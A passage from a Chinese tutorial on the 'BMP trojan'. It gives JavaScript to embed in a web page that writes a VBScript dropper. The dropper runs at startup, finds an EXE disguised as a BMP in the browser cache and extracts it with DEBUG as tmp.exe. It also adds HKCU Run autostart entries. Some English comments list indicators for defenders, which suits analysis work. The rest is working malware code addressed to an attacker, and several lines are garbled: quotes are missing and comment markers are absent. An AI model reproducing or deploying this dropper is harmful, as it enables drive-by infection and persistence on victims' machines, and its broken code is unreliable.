详解BMP木马(3)
st.WriteLine( Lt.Close);
st.WriteLine( WSH.Run "command /c debug " & tmp & "tmp.dat <" & tmp & "tmp.in >" & tmp & "tmp.out",false,6);
st.WriteLine( On Error Resume Next );
st.WriteLine( FSO.GetFile(tmp & "tmp.dat").Copy(winsys & "tmp.exe"));
st.WriteLine( FSO.GetFile(tmp & "tmp.dat").Delete);
st.WriteLine( FSO.GetFile(tmp & "tmp.in").Delete);
st.WriteLine( FSO.GetFile(tmp & "tmp.out").Delete);
st.WriteLine( end if);
st.WriteLine( If Folder.SubFolders.Count <> 0 Then);
st.WriteLine( For Each SubFolder In Folder.SubFolders);
st.WriteLine( SearchBMPFile SubFolder,fname);
st.WriteLine( Next);
st.WriteLine( End If);
st.WriteLine(End Function);
st.Close();
}
// Top-level statement that follows the function body closing on the previous
// line (presumably docsave; its definition starts outside this excerpt).
// NOTE(analysis): as written, `docsave()` is evaluated when this statement
// runs and its return value is what setTimeout receives. When replaying the
// sample in a sandbox, expect the file-write activity at script load rather
// than after the 1000 ms delay.
setTimeout(docsave(),1000);
把该脚本保存为"js.js",在网页中插入:
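该脚本会在本地机器的SYSTEM目录下生成一个“S.VBS”文件,该文件会在下次开机时自动运行,其作用是从浏览器缓存(Internet临时文件)目录中找出mybmp[1].bmp文件。对防御方而言,SYSTEM目录下新出现的.vbs文件,以及HKCU\Software\Microsoft\Windows\CurrentVersion\Run下新增的启动项,是这一阶段最直接的检测点。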
“S.VBS”文件主要内容如下:
' S.VBS main section as listed in the article. It runs once at startup, swaps
' its own autostart entry for one pointing at tmp.exe, then hands the cached
' BMP to SearchBMPFile.
' Indicators visible in this listing: HKCU Run values "vbs" and "tmp",
' the file name tmp.exe, and the cache file name mybmp[1].bmp.
Option Explicit
' str is declared at script level; SearchBMPFile assigns it when building the candidate path.
Dim FSO,WSH,CACHE,str
' Both COM objects are standard Windows Script Host components, so no extra
' binaries are needed at this stage.
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WSH = CreateObject("WScript.Shell")
' Reads the per-user "Cache" shell-folder value (path as printed on the page);
' the article describes this as the temporary directory where the BMP lands.
CACHE=wsh.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellFolders\Cache")
' Removes the Run value named "vbs" -- presumably the entry that launched this
' script; whatever created it is not visible in this excerpt.
wsh.RegDelete("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\vbs")
' Registers "tmp.exe" under the per-user Run key. This happens before the
' search below, so the value is written whether or not the BMP is found;
' a Run\tmp value with no matching tmp.exe on disk is still an artefact of this script.
wsh.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\tmp","tmp.exe"
' Starts the search at the cache folder for the fixed file name "mybmp[1].bmp".
SearchBMPFile fso.GetFolder(CACHE),"mybmp[1].bmp"
WScript.Quit()
Function SearchBMPFile(Folder,fname)
Dim SubFolder,File,Lt,tmp,winsys
从临时文件夹中查找目标BMP图片
str=FSO.GetParentFolderName(folder) & "\" & folder.name & "\" & fname
if FSO.FileExists(str) then
tmp=fso.GetSpecialFolder(2) & "\"
winsys=fso.GetSpecialFolder(1) & "\"
set File=FSO.GetFile(str)
File.Copy(tmp & "tmp.dat")
File.Delete
生成一个DEBUG脚本
set Lt=FSO.CreateTextFile(tmp & "tmp.in")
Lt.WriteLine("rbx")
Lt.WriteLine("0")
Lt.WriteLine("rcx")
下面一行的1000是十六进制,换回十进制是4096(该数字是你的EXE文件的大小)
Lt.WriteLine("1000")
Lt.WriteLine("w136")
Lt.WriteLine("q")
Lt.Close
WSH.Run "command /c debug " & tmp & "tmp.dat <" & tmp &"tmp.in>" & tmp & "tmp.out",false,6